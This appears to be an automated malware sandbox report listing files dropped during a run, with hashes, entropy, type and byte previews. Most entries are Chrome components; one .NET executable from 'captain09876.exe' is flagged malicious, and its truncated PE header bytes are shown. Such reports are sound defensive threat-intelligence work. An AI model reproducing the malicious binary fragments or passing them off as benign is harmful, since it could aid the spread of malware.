                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1765
                                                                                                                                                                      Entropy (8bit):6.027545161275716
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:p/hii6zkvVI1Jip2qRNHvakuQkCNFxdsGwmBKkgum91:Rz0kv6cNvaYNFwSEhug
                                                                                                                                                                      MD5:45821E6EB1AEC30435949B553DB67807
                                                                                                                                                                      SHA1:B3CADEB17FE5B76B5DBB428B8D3A07B341F8B1BC
                                                                                                                                                                      SHA-256:E5FAE91295BECF7F66BFA4BE1061CA5537ED763EB5D01485F23ECFB583304FEE
                                                                                                                                                                      SHA-512:BCBE40CAFAA4B14566D91E361D8FB7F0288D5C459FA478AA4C575444DA4D406E1076FC0B3A31D4A9E5EE034F0FE15A0EFE8A8A52B838DE94B96D3E488D28F0FE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJSZWNvdmVyeS5jcngzIiwicm9vdF9oYXNoIjoiaGdCR051SzhNR2NKaDlfNmZQaFdEWmpVYUFKeklzeDlJS21DUEZvb0dfUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIwYXduVFBFQmdDRHkyV05hVVk3Um9mSWN3c3ZwNHFRNUxzZVMxVXRiVXY0In1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoiaWhubGNlbm9jZWhnZGFlZ2RtaGJpZGpobmhkY2hmbW0iLCJpdGVtX3ZlcnNpb24iOiIxLjMuMzYuMTQxIiwicHJvdG9jb2xfdmVyc2lvbiI6MX0","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"iFuMX_kOZ-zJ7KVu6Lxb3rHWZgQvkZhv25x_SGlBiDV_okALrGbj6rUOWyNNNsHXMnT118XZmA696XR8qkr4dwT5Gvez-9gi-WYBY7XBkgo7v6NspGgJF89BNCeI-P9k-zBHOGgrf-fCEiAcoM7xCx9_f8qlRy7nhQPyjOIHn5eEJEir0uSu6gdqR9afnVZ3UoR-VOLdOBt7fA4ee38MP2ut5qWU50F5dvIezfKkTVDMHwztvcLCy6R9SVkdSYv6jwWGccYRl-aclvkkHu6SnbZGI7fmDZdkcBAxBHYEZZMmvb76ro4SO15GDyEVAo_Qf4trdrY_GyN_Bm73imCTjgtoGc
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66
                                                                                                                                                                      Entropy (8bit):3.7900469623255675
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:SpOXzxlQ4BdPWfDL9c:SpOjDQFfVc
                                                                                                                                                                      MD5:2AE14F91312C4E8034366B09D49D5B18
                                                                                                                                                                      SHA1:AD4933A5D838D0FA0B960C327A5039A9E8249642
                                                                                                                                                                      SHA-256:4F122332EF0F2BB490EF59619D3602C1A7277C0A7A19C132202DB4803A09BFA2
                                                                                                                                                                      SHA-512:FB0CC467A4B8463F6A3BF42CDC11C23B34EB94A9397644B68714DCB819EE326BAE05022D59D23DC9907DF1E6928064D853FD0900BB6083417892D4D5A9BA7716
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:1.aeedb246d19256a956fedaa89fb62423ae5bd8855a2a1f3189161cf045645a19
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):195
                                                                                                                                                                      Entropy (8bit):4.682333395896383
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:rR6TAulhFphifFJ9LAG9Xg0XTFHqS1wP/pEeSWU4pv/8F/FxLj2RF2fcTZTotL:F6VlM90ggITgS1wnuWfB0NpK4aotL
                                                                                                                                                                      MD5:7A8E3A0B6417948DF4D49F3915428D7A
                                                                                                                                                                      SHA1:4FC084AABDB13483567D5C417C7ED8FD16726A80
                                                                                                                                                                      SHA-256:D1AC274CF1018020F2D9635A518ED1A1F21CC2CBE9E2A4392EC792D54B5B52FE
                                                                                                                                                                      SHA-512:064D84A57B28C19AD10742859DA493D0826B47ADC632F6C623DFB4DE36D72A9D29BE98518061A9FFD42D99FCF01F27DE39CE74782B3A5ACBBE11DFDDEEAB59A1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{. "manifest_version": 2,. "name": "ImprovedRecoveryComponentInner",. "version": "1.3.36.141",. "imageName": "image.squash",. "squash": true,. "fsType": "squashfs",. "isRemovable": false.}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Bentley/Intergraph MicroStation
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12
                                                                                                                                                                      Entropy (8bit):3.584962500721156
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:qKaDO:qKaDO
                                                                                                                                                                      MD5:682E1B9EAAE0E93E0E185C9525986E96
                                                                                                                                                                      SHA1:0B1ABED8120DA66D2B76B67D1881C3615EF3436D
                                                                                                                                                                      SHA-256:E2CE5550B6AA239D48F404D5BB33696E58F959C9B305C64E5BBC50BE82B30CFA
                                                                                                                                                                      SHA-512:2791CE607B94C2DC4349227819DC719F135955DCA552AB403969353E14F4C74B1564785FCAB9B5F69F5E763CD7A432FC2F01B8E26899F081A2C8A262B7AEFDA7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.....0"..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):13924
                                                                                                                                                                      Entropy (8bit):4.524411316778424
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:6ZuzUpYY9WW1H9xjMqvo0zjCOgxcyR7dCMUdvRWqIC2s8vvcr17/eFt9n9nFWB5A:JQEWh9x7ghb4r7pi4nBf+
                                                                                                                                                                      MD5:DD91CF850364320FA627573BEAAA8BDE
                                                                                                                                                                      SHA1:05F312EB672A32EF95ADEFC51A0BDC688C4B71AA
                                                                                                                                                                      SHA-256:CA54E4D1D1AE7932CE97FEDE0717956905BD9E796779ACC4C1A0BA75737F91AC
                                                                                                                                                                      SHA-512:B65A5D07646FDE821BE8A281002C2DB233E40184CF2E397443D5D659BE25679F5370AFD3C32D594FD828EBB37799147522357C40167711BC27C26E71CE066104
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:....TFL3.. .............................t...@...P...$5..............4...........N...........CONVERSION_METADATA.............M...........min_runtime_version.O...........................................x...p...h...P...<...(...................................t...`...L...8...$...............................................................x...p...h...`...X...P...H...@...8...0...(... ...................................................................................x...X.......N.......D............... ...............................................2.11.0..............1.14.0.............................................................................................................................................................. ...$...(...,...0...4...8...<...n............d3?...=..............Z=.x.>...............<............................b$.?..............k...............5?..............X?............'5.?..............j.............6.5?&...........N.X?6...............F...........0..>V...
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):200
                                                                                                                                                                      Entropy (8bit):5.437791346330686
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:AlOuHVRKgLOczRb4ny3/NqBpjptCGNLEJyIn:ALXzrpEyFq1wGNo4I
                                                                                                                                                                      MD5:871C99F74EF7B90E6BC36E278398263E
                                                                                                                                                                      SHA1:D967C65B5374F879247FFED4E3A3567A61DDA6CE
                                                                                                                                                                      SHA-256:0BA5B4104DE22C5586D39817CA052DF617FF41B387D3EB4C4FBB4F9C6F2B8007
                                                                                                                                                                      SHA-512:D7020EFBA3AB9D58A0396C6652A6A8E9507D549531D069C31F5597E12B115427A1BC17B13ED18863F18561DB2E87EAA5F7599DC83598C52FD8792A9E9539815C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:........"..2...Ytype.googleapis.com/google.internal.chrome.optimizationguide.v1.SegmentationModelMetadata.].(....Session.TotalDuration.T<.A..GO .(.0..... .(.0.:'..chrome_low_user_engagement........?..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):27244
                                                                                                                                                                      Entropy (8bit):3.8842802707357547
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:fUhIi/t/ZHNb6uqTKDW+y15z+3XBvd/JoL34F8CC6IYYr1lNKnTHa5xNSM+6O/gd:iIilRtb6uqTKDW+y15z+nBvd/JoL34Fw
                                                                                                                                                                      MD5:89932ADF9CC14986CA58687A6FAD996D
                                                                                                                                                                      SHA1:0F96CBF80B1D7AE823A4A78C44CE61ACD2020BE9
                                                                                                                                                                      SHA-256:68E66131713862F4418E14512883753CA275304E971A078D907C463F295194B9
                                                                                                                                                                      SHA-512:5C5E0AD32D94886D3E73544676FC8BC90694922CA5E11B82A6E63D1F02F0626642D2B8B0A1B7C72FAC1ED8DFFD63DBCB26185708A59950BC4077F489CD624DB6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:....TFL3.. ..........................................i..........................<.......serving_default.........`...............output_0........................inputs......,.......................CONVERSION_METADATA................min_runtime_version..... ...................................p...\...H...4... ...................................l...X...D...0.......................................t...l...d...\...T...L...D...<...4...,...$...................................................................................|...t...l...d...\...T...L...D...<...4...,...$...................................................................................|...t...l...d...\...T...L...D...<...4...,...$...................................................................................|...t...l...d...\...T...L...D...<...4...,...$...................................................t...`...L...8...$...................................p...\...H...4... ...................................l...X...D...0...........
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):248531
                                                                                                                                                                      Entropy (8bit):7.963657412635355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                      MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                      SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                      SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                      SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):29066
                                                                                                                                                                      Entropy (8bit):7.991921788984723
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:768:FFOgtnBj0RahBqviQqSCz9VHEoffDdZ64VOKAZGD:ygtnB1hBq1qSCBGoffDj7
                                                                                                                                                                      MD5:DF9EFFA3926C4B16A9E3BE5B4C11985D
                                                                                                                                                                      SHA1:C8225B259FC188045647BF304FB45ECF85705F7D
                                                                                                                                                                      SHA-256:CC812B1135DF094ECDD5B6A29C9FF5E48079B0CED0AF94E133C5B32079A00894
                                                                                                                                                                      SHA-512:2CC9B14CB9362005406EEA8E23C22BAF530436201808C0A6AFC1E08B0B666609217EE5BE837B112E06FB8F0857EE4C881D0359A2FA7B2F5B8D40C8A66A7C8254
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:...........}ks.G..w...l... ...6ey....DjI.....h...W`7..A.!....|..AP...q&d..*+.*+_....#...}..+....L...8...ty#...u^.=q8..jT.B........x_J.OEu.....X.q>.......D..E"..N...~..<....U.I%.I&F.!M.e6.i..x38.^..4.......n.o....6.w..$..e)..H,......R...4/.,[.``...|~#....v..ZK....t\.^...."..../.....I`.Rf8.....m~0!...a.b..Hn.g~...8T-.....%..`..g!.e....."..c..lM..J.,.y...[B(.e...y2...YW..ku.+z....Z...H..w..aQ$.....Ic...O.Y.....g....mR..U..+.T...80U.z9....g@P....Lo..YumZ....E.. ...]....l.%..'...'.}...|H/.!.._'.1..j..le....{.#....{=89..._....N.0.B..$+.y.'....3...........^ok.ge%*.hx..g..@..^W<..]..<..........{.....F%...d.T._Z..........(.FCL..P.r.X.S9A`I.3....,.t.3.]......%......I.\.8......Kb...BB....D..."...2..."<..D..|..+..w.._.y.....m@.Rl./..[9W.u..\...fH.j.F.1L......../N...d.......q....p..lp.@..95$z......^......'.O.d..cxu..<x=8........x1.....>.....u....(I....f$..(v..P.Y...J..gy.V.7_.,-.._A..E:I...0.....r....1X..........R.......Wp.4.@L......P....=0..t.....i.6.+:...E
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):301568
                                                                                                                                                                      Entropy (8bit):5.924564512138692
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:aTtE3uvM2NFiYotDEl5TAZcqSv9bHlxrLZ:6E+9FLhB7
                                                                                                                                                                      MD5:7559E903CFDD54C5A8BD7A1D6ACF6B13
                                                                                                                                                                      SHA1:8BC7123940975AD6885ABC41D7ACC3AD9722B582
                                                                                                                                                                      SHA-256:71E95DD74D5A827868E8CFA838F675AABF84BBFFC88585F94D53813B0589158D
                                                                                                                                                                      SHA-512:D513C14F45C9AE7D864BB04E51BD182FCCEDD0215DB60FDB98D447B11B8BAEFA165196FAE751DD0417AE4ABA09844EA916F8A5008ADE3E4932FDBE01ABCBA6ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b................................. ........@.. ....................................`.................................H...J.......N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N...........................@..@.reloc..............................@..B................x.......H..........d.............................................................(b...*..(b...*..(b...*..(b...*.0...........-.r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r$..p.....r2..p.....r...p.....r...p......:%...r...p.....r...p.....r...p.....*....(c...*"..(d...*...&...(e...*..&...(f...*...0..z.......r...p+L+M+N+S+T,=+S.%......sg...+G+L.,P&.oh....1.r...p.o
                                                                                                                                                                      Process:C:\Program Files (x86)\Company\NewProduct\captain09876.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):350301568
                                                                                                                                                                      Entropy (8bit):0.012174030822623444
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:c/hEO38gBF7W8nmiP30ZBGiC79rzVULmQ:wESOKDeAr
                                                                                                                                                                      MD5:CE25658AC9291C713590B834D96406BB
                                                                                                                                                                      SHA1:5A45881222B0E35968427EAF3185C9534AD54943
                                                                                                                                                                      SHA-256:0DFA582E65CF4E9EA1FD9575518FFF57B71B3F0F850DF643319C611D39A8C2C2
                                                                                                                                                                      SHA-512:8F7BEE11566FA8978A0E1716B51BA4E7735E98FC715A9EED0FB3B6E156ABFA46F378035935B5ED8967F98BCB3EF83599208A00225BBF0CB2655306846E3D354C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b............................&.... ........@.. ....................................`....................................J.......f............................................................................ ............... ..H............text...,.... ...................... ..`.rsrc...f...........................@..@.reloc..............................@..B........................H...........D.............................................................(b...*..(b...*..(b...*..(b...*.0...........-.r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r...p.....r$..p.....r2..p.....r...p.....r...p......:%...r...p.....r...p.....r...p.....*....(c...*"..(d...*...&...(e...*..&...(f...*...0..z.......r...p+L+M+N+S+T,=+S.%......sg...+G+L.,P&.oh....1.r...p.o
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:1
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:1
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3112
                                                                                                                                                                      Entropy (8bit):7.939241749332395
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:8CDA3FFA8BBC32485EDC42E13716ACE6
                                                                                                                                                                      SHA1:422303FEA67454E1D873AF39C3D3773468AC8660
                                                                                                                                                                      SHA-256:818B7BC5BFA41FFCD7233D78ECDDF779B77E4868EF2B9485312001CAD6C63361
                                                                                                                                                                      SHA-512:B397F2A9146FCB109F37F499F828AB2C8431DFD125873D318A90DA809126F45A1012D75DC86DA506E0D09A5226AC4ECB8B768CCB47198FF29AD0AFAC8C33FB39
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:............ko.7......J...&9....GN........Wj...^.[.kE...........N0`......."...DTkY......O...#....^..Z/.T)9-Kb...L1y......\+F..E.......D.....[&9..tM(yqu.H.u.HYd...^PM2..!...yN...>..|{.....GG...RYs]....0....a.Z.4._.J3..hV.L.....|..rL..9...%S.....;...$.W...5 2)....s.OH..&.......32..&....$.y.p.d...I&b..2.Q$......t..4.'X.Bm....w.95y`.._...*mV.$B.......q.H......<DT.v..9...Z.^.....o.v.k.I.x.[....X.(.....kC(....!...;;.9..aC.[.R...)}.g.m......}Ds.tJ..Rr>#.N...R.1..jg.......a;....L.%Ee........;...*...Y`.......V....h..aK.....2z4.<j&.L(.B...j....Q.-@...L>#..........V...7........E..q@h...Rd..y..f....g.............b....E.DWw....&...~V...eh@..'..{.n.V<.1<o...Zz..*...pP.I.s.j..x..0..6...5;..Q.\)...<UL.a..T.pY....&:.h...X\....kK.B..T3O...s.X..il.6&.%..R.u9.(....'n..4.._.{..B.Cyc....W..Y.m'.w..Q`. 1......b...I.....!.o`..rc...?WZH......G......B.{7..Gw .S._wU............4...r.B.....hY...$..SH..'.......`1E.....d4_.0.....C...6..g.A...V.9.o)Q..Y!.-0y...1..H.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):248531
                                                                                                                                                                      Entropy (8bit):7.963657412635355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                      SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                      SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                      SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):796
                                                                                                                                                                      Entropy (8bit):4.864931792423268
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                                      SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                                      SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                                      SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):675
                                                                                                                                                                      Entropy (8bit):4.536753193530313
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                                      SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                                      SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                                      SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):641
                                                                                                                                                                      Entropy (8bit):4.698608127109193
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:76DEC64ED1556180B452A13C83171883
                                                                                                                                                                      SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                                                                                                                                      SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                                                                                                                                      SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
